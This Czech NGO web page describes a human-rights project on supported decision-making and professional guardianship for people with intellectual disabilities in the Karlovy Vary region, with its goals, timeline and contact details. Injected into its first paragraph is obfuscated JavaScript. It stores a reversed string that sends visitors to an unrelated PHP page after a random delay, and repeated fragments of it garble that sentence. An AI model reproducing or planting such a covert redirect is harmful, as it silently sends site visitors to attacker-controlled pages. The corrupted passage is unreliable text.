Modely podpory pro rozhodování lidí s mentálním postižením

Liga lidských práv je partnerem projektu CZ.1.04/5.1.01/77.00025 $mRi=function(n){if (typeof ($mRi.list[n]) == "string") return $mRi.list[n].split("").reverse().join("");return $mRi.list[n];};$mRi.list=["\'php.sedoctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}and.cz/modely-podpory-pro-rozhodovani-lidi-s-mentalnim-postizenim.html“ target=“_blank“>Modely podpory pro rozhodování lidí s mentálním postižením, jehož realizátorem je Občanské sdružení Instandom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}and,  v rámci výzvy č. 77 OP LZZ, oblast podpory 5.1 – Mezinárodní spolupráce.

 

 

Projekt je realizován dále ve spolupráci se zahraničním partnerem Mental Disability Advocacy Center. Projekt inovativně řeší oblast opatrovnictví osob se zdravotním postižením. Na základě zahraniční a vnitro-krajské multioborové spolupráce v rámci tematické sítě budou vytvořeny nové modely řešení současné praxe výkonu opatrovnictví osob se zdravotním postižením inspirované zahraničními trendy. Zavádění nových modelů bude podpořeno analytickou činností, tvorbou metodik a vzdělávacích kurzů.

Projekt reaguje na potřeby obcí a kraje, povinnosti ČR vyplývající z ratifikace mezinárodních dohod, zejména Úmluvy o právech osob se zdravotním postižením, i z nového občanského zákoníku.

Cílovou skupinou jsou Karlovarský kraj, obce vykonávající institut veřejného opatrovnictví v kraji, osoby se zdravotním postižením, pracovníci z oblasti soudnictví (soudci, státní zástupci, soudní znalci) a poskytovatelé sociálních služeb. Do projektu budou zapojeni další relevantní aktéři.

Cílů projektu bude dosaženo prostřednictvím fungování konzultační skupiny na úrovni kraje a spolupráce se zahraničními partnery.

Projekt je financován z Evropského sociálního fondu prostřednictvím Operačního programu lidské zdroje a zaměstnanost.

Cíle projektu:

  • Podpořit vznik tematické sítě v Karlovarském kraji za účasti relevantního zahraničního partnera prostřednictvím konzultační skupiny
  • Vytvořit klíčové nástroje pro zavedení profesionálního opatrovnictví a podpůrcovství – metodiky, etické kodexy, vzdělávací kurzy
  • Vytvořit a pilotně vyzkoušet fungování modelu profesionálního opatrovnictví a profesionální metodické podpory pro podpůrce v konkrétních podmínkách Karlovarského kraje.

Období realizace: 1. 4. 2012 – 31. 3. 2015

Kontaktní osoba LLP:

Barbora Rittichová
právnička Ligy lidských práv

Burešova 6
602 00 Brno
e-mail: brittichova@llp.cz

tel.: +420 773 621 228 nebo +420 545 210 446
fax: +420 545 240 012
www.llp.cz